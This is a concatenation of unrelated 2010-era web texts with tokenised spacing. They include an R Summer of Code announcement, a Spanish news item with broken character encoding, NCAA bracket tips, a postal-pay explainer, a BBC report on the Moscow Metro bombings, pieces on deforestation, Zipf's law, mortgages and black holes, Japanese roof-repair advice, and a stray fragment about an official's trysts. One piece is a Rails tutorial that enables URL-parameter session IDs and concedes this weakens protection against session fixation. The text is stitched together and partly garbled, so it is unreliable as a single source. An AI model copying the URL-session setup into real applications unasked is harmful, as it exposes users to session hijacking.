Hadley Wickham of Rice University , USA
Chidambaram Annamalai , “ rdx – Automatic Differentiation in R ” , mentored by
John Nash of University of Ottawa , Canada
Yasuhisa Yoshida , “ NoSQL interface for R ” , mentored by Dirk Eddelbuettel ,
Chicago , USA
Felix Schoenbrodt , “ Social Relations Analyses in R ” , mentored by Stefan
Schmukle , Universitaet Muenster , Germany
Details about all proposals are on the R Wiki page for the GSoC 2010 at
http://rwiki.sciviews.org/doku.php?id=developers:projects:gsoc2010
The R Project is honoured to have received its highest number of student
allocations yet , and looks forward to an exciting Summer of Code .
Please
join me in welcoming our new students .
At this time , I would also like to thank all the other students who have
applied for working with R in this Summer of Code .
With a limited number of
available slots , not all proposals can be accepted — but I hope that those
not lucky enough to have been granted a slot will continue to work with R and
towards making contributions within the R world .
I would also like to express my thanks to all other mentors who provided for
a record number of proposals .
Without mentors and their project ideas we
would not have a Summer of Code — so hopefully we will see you again next
year .
Regards ,
Dirk ( acting as R / GSoC 2010 admin )
* * *
From all the projects , the one I am most excited about is :
Ian Fellows , “ A GUI for Graphics using ggplot2 and Deducer ” , mentored by Hadley Wickham of Rice University , USA
Deducer ( text from the website ) attempts to be a free easy to use alternative to proprietary data analysis software such as SPSS , JMP , and Minitab .
It has a menu system to do common data manipulation and analysis tasks , and an excel - like spreadsheet in which to view and edit data frames .
The goal of the project is to two - fold .
Provide an intuitive interface so that non-technical users can learn and perform analyses without programming getting in their way .
Increase the efficiency of expert R users when performing common tasks by replacing hundreds of keystrokes with a few mouse clicks .
Also , as much as possible the GUI should not get in their way if they just want to do some programming .
Deducer is designed to be used with the Java based R console JGR , though it supports a number of other R environments ( e.g. Windows RGUI and RTerm ) .
This combination ( of Deducer and ggplot2 ) might finally provide the bridge to the layman - statistician that some people recently wrote to be one of R ’s weak spots ( while other bloogers wrote back that this is o.k. , still no one refuted that R does n’t compete with the point - and - click of softwares like SPSS or JMP . )
I came across Ian in the discussion forums , where he provided very kind help to his package “ deducer ” .
Coupled with having Hadley as his mentor , I am very optimistic about the prospects of seeing this project reaching very high standards .
Very exciting development indeed !
Update : Ian ’s proposal is available to view here .
p.s : for some intuition about how a GUI for ggplot2 can look like , have a look at this video of Jeroen Ooms ’s ggplot2 web interface
Argumentan que los puentes no han funcionado como se esperaba y en cambio se ha perdido la promoci�n de los valores c�vicos ; a cambio plantean como descansos obligatorios al menos siete d�as al a�o
� ADI�S A PUENTES ?
Los pri�stas en San L�zaro dicen que la poblaci�n no identifica el motivo por el que deja de realizar sus labores tanto acad�micas como laborales .
( Foto : Archivo )
Ciudad de M�xico | Jueves 18 de marzo de 2010
Notimex | El Universal
13:40
Ah , March .
Spring is springing , the clocks have been turned forward , and at offices all across the country , people who 've never seen a college basketball game are earnestly discussing Kansas 's starting five , and wondering why Kentucky got such a tough bracket .
Yes , it 's NCAA basketball tournament time , and that means it 's time to enter your office pool .
We 've got a different way of looking at the field of 64 teams , one that just might help you bring home the prize .
Here 's the idea : Generally , most people 's picks in tournament pools look pretty similar – after a while , you start to have consensus .
For instance , the millions of users in ESPN 's online pool almost all think that the top four seeds will win their first game ( and they 're almost certainly right , as a top seed has never lost to a 16 seed in the first round ) .
But you can look at each round , and each game , and see the percentage of players who 've picked which winner .
Call it the wisdom of the crowd , which is pretty darn good .
Even with the unpredictability of the tournament , the crowd 's consensus picks usually finish in the 80th percentile or so .
That 's not good enough to win your pool , though .
You need to be looking for teams that the crowd is undervaluing , or overvaluing .
That 's what we 've done in the chart below :
Here 's what those numbers mean .
They 're the difference between the crowd 's pick at ESPN , and the statistical predictions of two top college basketball analysts : Ken Pomeroy , and Jeff Sagarin .
Both sets of ratings can be used to calculate a team 's expected chance to reach a certain round of the tournament .
I 've then taken the two ratings and averaged them together , and then compared them with the ESPN percentages .
A positive number means that the stats say a team is more likely to win than the crowd thinks ; negative means that the stats say they 're more likely to lose than the crowd thinks .
Games that have more than a 10 percent difference are highlighted – green showing teams that are good bets compared to the crowd , and red showing bad bets .
So , you 'll see that most of the top seeds are highly inflated , especially Kentucky .
Kansas is also overvalued by the crowd , although they are still the statistical guys favorite to win it all .
It 's just that 38.8 percent of ESPN users are picking the Jayhawks as national champs , while the statheads peg them with a 27.6 percent chance .
But Duke is n't getting much respect from the crowd , and might be a good pick .
Three teams jump out to me as very undervalued by the masses – Wisconsin , Brigham Young , and Florida State .
Objective ratings give Wisconsin a 28.9 percent chance of reaching the Elite 8 , while only 6.8 percent of ESPN users have picked them to do so .
That 's a big gap , and one you might be able to exploit .
The single biggest gap between the two sets of picks ?
Old Dominion in its first - round matchup against Notre Dame .
Only 14.9 percent of ESPN users have picked ODU to knock off the higher - seeded Irish , while the stats actually make them a slight favorite , at 50.85 percent .
As I wrote last year , this is a high - risk , high - reward strategy .
Stick with the crowd and you probably wo n’t win , although you likely wo n’t finish last .
But since most pools only pay for the top few slots , you might as well go for it , right ?
Chris Wilson has a story up on Slate , an update of one he did last year , that covers some similar ground to this – it's a good read , so check it out .
The complete Google Docs spreadsheet is available , so you can see the math .
I 'd love to hear your thoughts and suggestions , and how you do in your pool !
Photo : Kentucky guard John Wall ( 11 ) scores against Tennessee during the second half of an NCAA college basketball semifinal round game at the Southeastern Conference tournament on Saturday , March 13 , 2010 , in Nashville , Tennesse .
Kentucky won 74 -45 .
Associated Press / Wade Payne
A government shutdown is a situation where the non-essential government offices are closed down as a result of no funding .
This situation arises when the budget is yet to be approved and remains so for as long as the budget has not yet been passed .
While a government shutdown may be ongoing , the essential offices remain open and entitled to pay at the end of the period , or a spending bill may be approved for them .
The essential offices are those offices that are so important that if they are affected by the shutdown , the life , health , and safety of members of the public will be jeopardized .
Such offices include the Federal Bureau of Investigation ( FBI ) , Prison services , US Marshals , Customs , hospitals , etc .
Non-essential workers are not required to go to work during a government shutdown and are also not entitled to pay during that period .
Are postal workers getting paid during the government shutdown ?
Postal workers are deemed to be essential workers .
They are considered to be one because they still perform their duties during a shutdown .
Even though the Postal Service is a federal institution , it is not funded by taxpayers ’ money .
Therefore , the salaries of postal workers are not affected by a government shutdown , because their funding is independent of the government and its budgetary processes .
How Is The US Postal Service Funded ?
The Postal Service is an institution owned by the government .
As a result , the government exercises powers over it .
The Postal Service is an independent body , even though it is an agency of the government .
It also enjoys certain privileges because it is a government - owned institution .
However , the government is not involved in the funding of the Postal Service .
It allows it to generate the funds used for its operation .
The Postal funds its activities from selling postage alongside with its products and services .
The government does not fund the Postal Office but is involved in determining its rules , regulations , and prices .
The US Postal Office is not intended for profit - making .
As a result , the charges on products and services are regulated .
However , they must be adequate to cover the cost of operations .
Who Pays The Salaries Of US Postal Workers ?
As mentioned earlier , the US Postal Service funds its operations and is not funded by taxpayers ’ money .
Thus , it should be noted that the US Postal Service is charged with the payment of workers ’ salaries as part of the operational cost that is its responsibility .
It is understandable why postal workers continue working and get paid during a government shutdown .
They keep working because they are an essential office and also because they do not depend on the spending bill of the US government to run its operations .
What Role Does The Postal Service Play ?
The US Postal Service is saddled with the task of delivering postal services .
It concerns itself with delivering letters , parcels , sorting , and mailing .
It also sells postal products such as postage stamps , supplies , and other stationeries needed at the post office .
How Is The US Postal Service Managed ?
The Board of Governors governs the US Postal Service .
They are responsible for determining the rate of postal products and postal services .
They also formulate policies and the rules that guide the Postal Service in the course of discharging its role to the public .
The Board of Governors consists of eleven members .
The President appoints nine of its members , and the appointment is subject to the confirmation of the Senate .
The remaining two members of the Board are appointed by the nine members appointed by the President .
The two members appointed by the members of the Board are the Postmaster General and the Deputy Postmaster General .
These two officers are responsible for the daily running of the Postal Service .
The Privileges Enjoyed By The Postal Service
The US postal is a quasi - government agency .
It means that though it is a government - owned institution , it is independent of the government in its funding and operations .
Due to its unique status and connection with the government , the Postal Service enjoys certain privileges , which will be discussed below .
One of the benefits that the US Postal Service enjoys is that it dominates the postal market .
It is often suggested that the Postal Service should be privatized to encourage competition in the sector .
When privatized , it eradicates monopoly and promotes competition in the market .
Competition in the postal market will be of great benefit to consumers who will begin to receive better services at a lower and competitive cost .
The US Postal Service also enjoys low - interest loans from the federal treasury and is free for the payment of some classes of tax .
It can also not be sued in some suits .
They also enjoy other privileges like sovereign immunity , eminent domain powers , the exclusive right to deliver first - class and standard mails , and can enter into postal treaties with other countries .
What Causes A Government Shutdown ?
The process of passing a federal budget is one that takes quite a lot of time .
It is a process that requires the input of the President , Congress , and other governmental institutions .
It is the process that determines the funding of the government and its activities .
Several factors result in delaying the budget from being approved .
It is often as a result of political and economic interest of the various stakeholders in government .
At the start of a fiscal year , the President and other government agencies are required to submit their request for funding .
A request for funding is a formal application specifying the amount of money needed for their operations .
After the President has reviewed it , it is sent to Congress .
Congress also considers it .
The budget will be voted upon on the floor of Congress .
Where the Congress agrees on it , it is sent to the President to assent to it and pass it into law .
The Effects Of A Government Shutdown
A government shutdown has an adverse impact on federal employees , the state , and the economy .
A government shutdown that does not last for long might go unnoticed and not have any effect .
However , when a government shutdown is prolonged , its impact is felt by all and sundry .
The primary effect of a shutdown is that it leads to a halt in many operations of the government .
Federal workers stay back and home and do not go to work .
It causes a lot of delay in several activities of the government
A prolonged shutdown affects the economy and destroys the credit rating of a country .
As a result of no payment for federal workers , patronages for businesses that are more patronized by federal workers are bound to be affected .
When a shutdown takes place , so many employees are furloughed and are not paid .
It has the effect of leaving persons and families that work for the federal government in great financial difficulty .
As a result , they find it difficult to feed , pay their rents , and other bills .
These employees are usually given a furlough notice that informs them of the shutdown and temporarily relieves them of their responsibilities until the shutdown comes to an end .
It is at the end of the shutdown that they resume work at their duty post .
However , those who remained at their duty post get paid at the end of the period .
One of the effects of a government shutdown is that it leads to a reduction in spending .
In a bid to survive the period of shutdown , workers have to reduce their expenses to the minimum .
The decline in spending affects businesses as they record lower patronage for goods and services .
Another impact of a government shutdown is that it becomes more difficult to recover loans that are due and also issue new loans to people .
Government agencies begin to close down or reduce the scope of their operations .
A government shutdown does not only affect government workers and all activities connected to the government .
Its impact is also felt in the private sector .
It is because when the economy is affected , the private sector is also affected .
National parks and monuments are usually affected by the government shutdown .
It is because they do not fall under the essential workers .
As a result , this affects businesses within the hospitality sector .
Their business records a significant reduction in sales .
Conclusion
Although government shutdown affects government workers and agencies of government , the Postal Service is usually unaffected because of its status as a quasi - governmental agency .
The question that is often raised is , are postal workers getting paid during the government shutdown ?
It is crucial to understand that the federal government does not fund the US Postal Service .
It generates its funds from its operations and sale of postal products and services .
As a result , postal workers remain paid during a government shutdown , even though they are government workers .
The postal workers stay at their duty posts .
A government shutdown does not threaten their job .
You May Like This Article As Well :
How Does Monetary Policy Affect Interest Rates ?
Anyone that lives in and around the Austin area – primarily members of the IGDA ( International Game Developers Association ) , but they may well be welcoming fresh faces – can meet up with Mike McShaffry and Dustin Dobson of Red Fly Studios to hoist a beer and talk about the making of their Wii version of Ghostbusters : The Video Game .
IGDA - Austin ’s Official April Event :
Ghostbusters Wii : The Post - DeathMortem
Presented by Mike McShaffry and Dustin Dobson of Red Fly Studios
In January of 2007 , three accomplished artists and one designer set out to carve a niche for themselves in the lonely city of Austin .
This was a time of strife within the games industry when giants all around this noble city were falling and being crushed under their own weight .
Two years later , Red Fly would become one of the leading third party developers within the Austin games industry .
Ghostbusters on the Wii was pivotal to this new established identity for the studio and its body of approximately 80 employees .
This is the origin story … of a haunted game ….
and the takeaways from its development that will shatter your soul !
Thursday , April 22nd 2010
7:30 pm
Buffalo Billiard ’s ( http://www.facebook.com/BuffaloBilliardsATX )
201 East 6th Street
Austin , TX 78701-3625
Please turn on JavaScript .
Media requires JavaScript to play .
At least 38 people were killed and more than 60 injured in two suicide bomb attacks on the Moscow Metro during the morning rush hour , officials say .
Female suicide bombers are believed to have carried out the attacks on trains that had stopped at two stations in the heart of the Russian capital .
No group has yet claimed responsibility for being behind the attacks .
But Russian security services believe the bombers are linked to militant groups in the North Caucasus region .
Past suicide bombings in the capital have been carried out by or blamed on Islamist rebels fighting for independence from Russia in Chechnya .
Prime Minister Vladimir Putin cut short a visit to the Siberian city of Krasnoyarsk and said a crime that was " terrible in its consequences and heinous in its manner " had been committed .
" I am confident that law enforcement bodies will spare no effort to track down and punish the criminals .
Terrorists will be destroyed , " he added .
President Dmitry Medvedev echoed his words after laying a wreath at the site of one of the attacks , saying : " They are animals .
I have no doubt that we will find and destroy them all . "
' Panic '
The first explosion tore through the second carriage of a train at 0756 ( 0356GMT ) , as it stood at central Lubyanka station waiting for morning rush hour commuters to board .
People were yelling like hell .
Within about two minutes everything was covered in smoke
Train passenger
Live : Moscow Metro bombings
In pictures : Aftermath of attacks Profile : Moscow Metro A Chechen link to Moscow bombs ?
The station , on both the busy Sokolnicheskaya and Tagansko - Krasnopresnenskaya lines , lies beneath the headquarters of the Federal Security Service ( FSB ) .
" I was moving up on the escalator when I heard a loud bang , a blast .
A door near the passageway arched , was ripped out and a cloud of dust came down on the escalator , " an eyewitness named Alexei told Rossiya 24 TV channel .
" People started running , panicking , falling on each other , " he said .
The second blast at Park Kultury , which is six stops away from Lubyanka on the Sokolnicheskaya line , came at 0838 ( 0438 GMT ) .
It struck at the back of the train as people were getting on board .
" I was in the middle of the train when somewhere in the first or second carriage there was a loud blast .
I felt the vibrations reverberate through my body , " one passenger told the RIA news agency .
" People were yelling like hell , " he said .
" There was a lot of smoke and within about two minutes everything was covered in smoke . "
The security services said the bomb that went off at Lubyanka station had an equivalent force of up to 4kg of TNT , while the bomb at Park Kultury was equivalent to 1.5 - 2 kg of TNT .
The devices - believed to have been made with the powerful explosive , hexogen , which is more commonly known as RDX - were filled with chipped iron rods and screws for shrapnel .
" The whole city is a mess , people are calling each other , the operators can't cope with such a huge number of calls at a time , " said Olga , a BBC News website reader in Moscow .
" Those who witnessed the tragedy can't get over the shock . "
Please turn on JavaScript .
Media requires JavaScript to play .
Moscow 's Metro is one of the most - used underground railways in the world , carrying about 5.5 million passengers a day .
The system was partially disrupted following the attacks , but damage to the stations was minimal and both had reportedly reopened by the evening rush hour .
President Medvedev asked officials to increase security on the public transport system nationwide .
" What was being done needs to be substantially strengthened , " he said .
" Look at this problem on the scale of the state , not only as it applies to a particular type of transport and a particular city . "
Deadliest attack
In a meeting with President Medvedev , FSB chief Alexander Bortnikov said its investigators believed the attacks had been carried out by " terrorist groups related to the North Caucasus " .
" This is likely to be our main conclusion , because fragments of the bodies of two female suicide bombers were found earlier at the scene of the incident and examinations show that these individuals came from the North Caucasus region , " he said .
Federal prosecutors said they had opened an investigation into " suspected acts of terrorism " .
The co-ordinated attacks were the deadliest in Moscow since February 2004 , when 40 people were killed by a bomb on a packed metro train as it approached the Paveletskaya station .
MOSCOW METRO ATTACKS March 2010 : Two suicide bombers blow themselves up at Lubyanka station and Park Kultury station , killing 35 people August 2004 : Suicide bomber blows herself up outside Rizhskaya station , killing 10 February 2004 : Suicide bombing on Zamoskvoretskaya line , linking main airports , kills 40 August 2000 : Bomb in pedestrian tunnel leading to Tverskaya station kills 13 February 2000 : Blast injures 20 inside Belorusskaya station January 1998 :
Three injured by blast at Tretyakovskaya station June 1996 : Bomb on the Serpukhovskaya line kills four Six months later , a suicide bomber blew herself up outside another station , killing 10 people .
Both attacks were blamed on Chechen rebels .
Federal security forces have scored a series of successes against militants in the North Caucasus in recent weeks .
In February , at least 20 insurgents were killed in an operation by troops in Ingushetia .
Chechen rebel leader Doku Umarov warned in February that " the zone of military operations will be extended to the territory of Russia ... the war is coming to their cities " .
Last November , he said his Caucasian Mujahadeen had carried out a bombing that killed 26 people on board an express train travelling from Moscow to Russia 's second city of St Petersburg .
The attack came six months after President Medvedev declared an end to Russia 's " counter - terrorism operations " in Chechnya , in a bid to " further normalise the situation " after 15 years of conflict that claimed more than 100,000 lives and left it in ruins .
Despite this , the mainly Muslim republic continues to be plagued by violence , and over the past two years Islamist militants have stepped up attacks in neighbouring Ingushetia and Dagestan .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Enlarge By David McNew , Getty Images Harvested trees in Sequoia National Forest are stacked July 2004 in an area burned during the massive McNally fire two years before in the Sierra Nevada Mountains of California .
Man -made causes of forest loss include logging and wildfires caused by people .
Natural causes would include natural wildfires and storm damage .
Out of seven of the most heavily forested nations on Earth , the United States experienced a greater percentage of forest loss from 2000 to 2005 than did any of the other countries , a study said Monday .
The United States lost more than 46,000 square miles of forest in those years , a size roughly equivalent to the state of Pennsylvania .
That 's about 6 % of the nation 's forested land .
GREENEST BUILDINGS : Architects pick 2010 winners EPA : Climate plan calls for forest expansion LATEST : Earth Day and other environmental news " That 's the most of the seven countries that have over 1 million square kilometers of forest , " says study lead author Matthew Hansen of South Dakota State University .
Worldwide , researchers determined that the globe lost forest cover of nearly 400,000 square miles — roughly 3 % of the world 's forested areas — during the first half of the last decade .
The other countries in the study were Canada , Russia , China , Brazil , Indonesia and the Democratic Republic of the Congo .
The study , which appears in the Proceedings of the National Academy of Sciences , found that the forest loss was the result of both human and natural causes .
" We do not quantify what the causes are , and we do not quantify how much forest gain there was from 2000 to 2005 , " Hansen says .
" But clearly , industrial harvesting / clearing is very important . "
Man -made causes of forest loss include logging and wildfires caused by people .
Natural causes would include natural wildfires and storm damage .
The one part of the contiguous USA that experienced the most forest loss was the Southeast , a large chunk of which lost more than 10 % of its forest cover from 2000 to 2005 , the year for which the most recent data were available .
Hansen points out that the forest loss in the USA is n't necessarily permanent : " This does not mean that ( the forests ) do not regenerate , and we make no statements whatsoever about sustainability , " he says .
" But , compared to other regions of the world , a lot is going on . "
The first of its kind , the study used satellite images to measure forest loss around the world .
Hansen says much more study in the area is needed as improvements are made in satellite technology and accessibility .
" We need to be more ambitious , " he says .
" If we had an improved monitoring capability , you could imagine a daily ' land report , ' akin to weather , where fires , floods , crop emergence , new forest clearing , new construction are quantified . "
Guidelines :
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
Read more
Norton 's COVID - 19 response :
We are here to help with your courses .
Details
Edward L. Glaeser is an economics professor at Harvard .
“ Zipf ’s Law ” is one of the great curiosities of urban research .
The law claims that the number of people in a city is inversely proportional to the city ’s rank among all cities .
In other words , the biggest city is about twice the size of the second biggest city , three times the size of the third biggest city , and so forth .
Zipf ’s Law is named after the linguist George Kingsley Zipf , who discovered the law when studying the distribution of words : the second most common word in a text typically shows up one - half as often as the most commonly used word .
The law has been observed in many other contexts , including firm sizes and income distribution , which follows the closely - connected Pareto Distribution .
In the urban context , the law seems to have been discovered by a German geographer , Felix Auerbach , many decades before Zipf .
Zipf ’s
Law is intellectually exciting because it appears to be both powerful and mysterious .
Why should such a simple relationship hold ?
Some very smart social scientists have been attracted to explaining why Zipf ’s Law emerges .
But before discussing their explanations , it is worthwhile descending into the data .
The figure below shows a plot of the population of the logarithm of 2009 metropolitan area populations against population rank .
As the plot shows , the biggest and smallest metropolitan areas are somewhat too small to fit Zipf ’s Law perfectly .
A massive meta-analysis by Volker Nitsch finds that the city - size distributions are typically somewhat too even to be described perfectly by Zipf ’s Law .
Edward L. Glaeser
These deviations from Zipf ’s Law are modest relative to the challenge to Zipf issued by Thomas Holmes and Sanghoon Lee in the book “ Agglomeration Economics , ” which I edited and described in last week ’s post .
Part of the appeal of Zipf ’s Law is that it appears be entirely natural .
As Steven Strogatz wrote in The New York Times about one year ago : “ No city planner imposed it , and no citizens conspired to make it happen . ”
But Zipf ’s Law seems to be mainly a product of city or metropolitan area boundaries , not the natural distribution of population .
Professors Holmes and Lee ignored political boundaries and split America up using a six - by - six - mile grid .
Their cities are squares crafted without any attention to actual boundaries .
Using Census
Block level data , they calculate the population of each square in the grid .
It turns out that Zipf ’s Law does n’t work for these fixed geographic areas .
Professors Holmes and Lee find that “ for squares above 1,000 in population , a Zipf ’s plot has a piecewise linear shape , with a kink at around a population of 50,000 , ” and “ below the kink the slope is 0.75 ; above the kink , it is around 2 . ”
In other words , in dense areas population drops far more quickly with rank than Zipf ’s Law would suggest , and in less dense areas , population drops off far too slowly to be compatible with Zipf ’s Law .
Zipf ’s Law is a bust at describing the population levels of areas within fixed boundaries .
But that does n’t make the law irrelevant .
It rather pushes us to understand why Zipf ’s Law holds across metropolitan areas , but not in large squares of fixed size .
Their work suggests that Zipf ’s Law is being powered by sprawl : the spread of population across space within metropolitan areas .
Xavier Gabaix produced a particularly significant contribution to our understanding of Zipf ’s Law about 10 years ago .
Professor Gabaix follows an old idea that random growth processes could produce Zipf - like outcomes .
He shows mathematically that Zipf ’s Law will result if the population growth rate of an area is independent of that area ’s initial population .
Population growth rates are independent of initial population , and this is commonly called Gibrat ’s Law , so Professor Gabaix seems to have illuminated the dynamic underpinnings of Zipf ’s Law .
But Professor Gabaix ’s contribution only pushes the puzzle back one step further .
Why should population growth rates be independent of initial levels ?
Why should n’t big cities grow more slowly or small cities catch up ?
My own view is that Zipf ’s Law is really about the operation of agglomeration — the attraction of people to more people — and sprawl .
An initial population attracts more people who live nearby .
As long as each person attracts about the same number of new people , then Gibrat ’s Law will follow and that gives us Zipf ’s Law .
At its heart , this strange mathematical regularity is really once again pointing to the power of agglomeration — the enormous value that human beings place on being near one another .
Update :
An earlier version of this post misspelled the name of Steven Strogatz .
The CBS News / New York Times poll also found that 18 percent of Americans identify themselves as supporters of the tea party movement .
Most tea partiers think taxes ' fair '
A majority of self - identified tea party protestors say the income taxes they will pay this year are “ fair , ” according to a new CBS News / New York Times poll .
Fifty - two percent in the poll of the 881 anti-tax activists surveyed said their taxes are “ fair ” compared to 42 percent who said they are not fair .
Six percent of the tea partiers did n’t know if their taxes were fair or not .
Advertisement
While the tea party activists had a more negative outlook on the taxes they will pay than the rest of the country , their views were not far off .
Among all Americans , 62 percent of those surveyed said their taxes were fair compared to 30 percent who do not .
Even though most of the tea party activists polled think their taxes are fair , cutting taxes and reducing the size of government are still purported to be the major cause of the movement whose acronym stands for “ taxed enough already . ”
The Tea Party Patriots – an umbrella organization of grassroots groups – unveiled its “ Contract from America ” on Wednesday , and five of the ten tenets were related to reducing taxes and government spending .
The poll also found 18 percent of Americans identify themselves as supporters of the tea party movement and that the activists tend to be white males older than 45 .
・雨漏りと火災保 険
風災や水害については火災保険の支払い対象（ご加入の保険の種類によって異なります）になる場合がありますが、雨漏りに関しては火災保険の支払い対象にならないケースが多くなっています。火災保険が適用されない理由は、建築物に使用されている材料の経年劣化が雨漏りの原因となっていることが多く事故性がないことがあげられます。自然災害などの突発的な天災で、家屋に損害をもたらすとみられる雨漏り修理につきましては、ご加入の保険会社までご連絡ください。
・自然災害後に横行する業者にご注意ください
竜巻や台風などの災害後は、悪徳商法が横行します。屋根や雨漏り修理をしなければ二次被害や三次被害が起こり大変なことになると不安をあおって、検討する時間を与えずに契約させてしまうのが手口のひとつです。見積り以上の高額な金額を請求されたり、雨漏りや雨漏り修理などの知識や経験がないため適した工事が行われていないことが問題となっています。実際に雨漏り修理や住宅の補修が必要な場合でも、複数の業者に見積りをとってみたり、信頼できる業者に依頼するようにしましょう。訪問販売業者の高圧的な態度に屈して契約してしまったら、お住まいの国民生活センターにご相談ください。
・雨漏り修理と瑕疵担保責任
法律が改正されてから不動産業者や建売業者は、新築、中古物件問わず、雨漏り修理が必要な物件の販売は禁止され、購入した建築物が雨漏りが発生した場合は、売主が雨漏り修理を行わなければならなくなったので、完全に雨漏りを修理を行うことができる業者が求められる時代になりました。当社の雨漏り修理の知識や技術がみなさまのお役に立てると幸いです。
Enabling url parameter based sessions in Ruby on Rails
Posted by Paul McMahon on 2010-04-09
Out of the box , Ruby on Rails uses cookies to store a user 's session ID .
This is fine for most applications , but does n't work if your application needs to support browsers that do n't support cookies , such as some mobile browsers .
Instead of putting the session ID in a cookie , it must be put in the URL .
This increases the possibility of session fixation attacks , where one user can take over another 's session , however if security is n't paramount , this is an acceptable trade off .
See the Ruby on Rails Security Guide for more details on these kinds of attacks .
To enable parameter based sessions in Rails , there are a number of changes you need to make .
First , in config / initializers / session_store.rb , change the default file from containing something like
ActionController :: Base.session = { : key => ' _application_session ' , : secret => ' secret ' }
to
ActionController :: Base.session = { : key => ' _application_session ' , : secret => ' secret ' , : cookie_only => false # allow session to be loaded from params } # Overwrite default cookie based store ActionController : : Base.session_store = :active_record_store
Now Rails can read the session ID from the URL parameters , and does n't store the session in a cookie ( the default behaviour ) .
Besides the ActiveRecord session store , other server based stores , such as the memcache store , work as well .
In addition to enabling Rails to read the session ID from the URL parameters , the session ID must be added as a parameter .
The most basic way of doing this is to define default_url_options in the ApplicationController :
def default_url_options ( options = nil ) { request.session_options [ :key ] => request.session_options [ :id ] } end
This will ensure that the session ID is always set in the URL .
The session ID can also be added conditionally , by doing something like the following :
def default_url_options ( options = nil ) if cookies_supported ?
super else { request.session_options [ : key ] => request.session_options [ :id ] } end end
If the session ID is not included in the parameters , it will fall back to the cookie .
" We expect you to repay your debts . "
Those seven words could save America .
Let me tell you why .
Heads , I win ...
Surely you 've heard of the onslaught of people walking away from their homes because their property is worth less than the mortgage balance .
Even borrowers who can afford their monthly mortgage payment are stopping , simply because it does n't benefit them anymore .
This is entirely legal in many states .
After the house is forfeited , " non-recourse " laws prevent lenders from going after these borrowers ' assets or garnishing wages in an attempt to be made whole .
It 's a one - way ticket :
If the housing market works in your favor , enjoy the ride .
If it does n't , that 's the lenders ' problem .
Better luck next time .
Individual homeowners are n't the only ones walking out .
In December , Morgan Stanley ( NYSE : MS ) abandoned ship on five San Francisco office buildings , turning the properties over to its lender .
A Morgan Stanley spokesman got right to the point , saying , " This is n't a default or foreclosure situation .
We are going to give them the properties to get out of the loan obligation . "
Not a bad deal -- for Morgan Stanley .
I support these walkers wholeheartedly .
Why ?
Because they 're following the law , and laws that help you should n't be ignored , even if you think they 're outrageous .
When someone offers you money , take it .
And when the law allows you to walk away from a debt , do it .
That 's rational behavior .
But it 's interesting to ask what the economy would look like if this were n't the law .
For one thing , other debts like credit cards and student loans have at least some recourse .
As anyone on the naughty list at Bank of America ( NYSE : BAC ) , Citigroup ( NYSE : C ) , or American Express ( NYSE : AXP ) can attest , banks will shake you upside down for every penny you 're worth if you default on these debts .
Second , non-recourse mortgages are unique to the U.S.
Most industrialized nations have laws allowing lenders to garnish wages and seize assets when borrowers default and the mortgaged property does n't cover the loan balance .
You borrow , you pay .
Tellingly , many of these countries did n't end up with a Chernobyl - style housing meltdown like we did .
Take Canada .
Its housing problems look practically nonexistent compared with ours .
One reason for this is that nearly every Canadian mortgage is full - recourse .
As one recent article put it :
If a bank in Canada forecloses on a home with negative equity , it can file a deficiency judgment against the borrower , which allows it to attach the borrower 's other assets and even take legal action to garnish the borrower 's future wages ...
The full recourse feature of Canadian mortgages results in more responsible borrowing , fewer delinquencies , and significantly fewer foreclosures than in the United States .
It 's hard to know exactly how big a difference this makes .
But take a look at this chart comparing Canadian mortgage delinquencies with those in the States .
Enough said .
Ditto for Australia .
As one Australian journalist wrote in The Wall Street Journal in 2008 :
When Australians borrow money to buy a house , they know that if they default and the mortgaged property does n't cover the debt , they will be responsible for the shortfall .
And the lender will chase them for it .
It 's a neat way of reminding Australians to borrow responsibly .
Not surprisingly , Australia currently has one of the healthiest real estate markets in the world , with 11 % growth last year after a barely noticeable 4 % drop in 2008 .
Come hell or high water , Aussies find a way to pay their debts .
Still not sold ?
Changing recourse laws would probably be about as popular as ending Social Security .
You 'd hurt a lot of people .
Admittedly , I doubt it will ever happen .
But anyone who actually supports the non-recourse system should have to explain the advantages it brings .
Other than supercharging homebuyers ' ability to speculate like frat brothers in Las Vegas , I can't think of many .
Do non-recourse home loans promote growth ?
Maybe the growth of mortgage brokers and derivative traders , but the real drivers of our economy -- the Microsofts ( Nasdaq : MSFT ) , Googles ( Nasdaq : GOOG ) , and Boeings ( NYSE : BA ) of the world -- gain nothing .
Does it encourage entrepreneurship ?
Maybe in the business of flipping condos , but that is n't much to be proud of .
Does it promote capitalism ?
If you believe that trust and a strong system of contract laws are two of capitalism 's tenets , then no .
Surely , though , it protects those who are down on their luck , right ?
Not really .
Even with a full - recourse system , bankruptcy laws protect those in over their heads .
So could " we expect you to repay your debts " be the seven words that save America ?
They wo n't solve all of our problems , but they 're certainly worth a shot .
Investigators found detailed accounts of his trysts both in the diary and on his home computer , where he even listed how much each woman had cost .
As well as meeting women in hotel rooms and night clubs , the official had a private room with a hidden video camera where he would film himself in action .
People sometimes ask , " Is the universe a black hole ? "
Or worse , they claim : " The universe is a black hole ! "
No , it 's not , and it 's worth getting this one straight .
If there 's any quantitative reasoning behind the question ( or claim ) , it comes from comparing the amount of matter within the observable universe to the radius of the observable universe , and noticing that it looks a lot like the relationship between the mass of a black hole and its Schwarzschild radius .
That is : if you imagine taking all the stuff in the universe and putting it into one place , it would make a black hole the size of the universe .
Slightly more formally , it looks like the the universe satisfies the hoop conjecture , so should n't it form a black hole ?
But a black hole is not " a place where a lot of mass has been squeezed inside its own Schwarzschild radius . "
It is , as Wikipedia is happy to tell you , " a region of space from which nothing , including light , can escape . "
The implication being that there is a region outside the black hole from which things could at least imagine escaping to .
For the universe , there is no such outside region .
So at a pretty trivial level , the universe is not a black hole .
You might say that this is picking nits , and the existence of an outside region is beside the point if the inside of our universe resembles a black hole .
That 's fine , except : it does n't .
You may have noticed that the universe is actually expanding , rather than contracting as you might expect the interior of a black hole to be .
That 's because , if anything , our universe bears a passing resemblance to a white hole .
Our universe ( according to conventional general relativity ) has a singularity in the past , out of which everything emerged , not a singularity in the future into which everything is crashing .
We call that singularity the Big Bang , but it 's very similar to what we would expect from a white hole , which is just a time - reversed version of a black hole .
That insight , plus four dollars or so , will get you a grande latte at Starbucks .
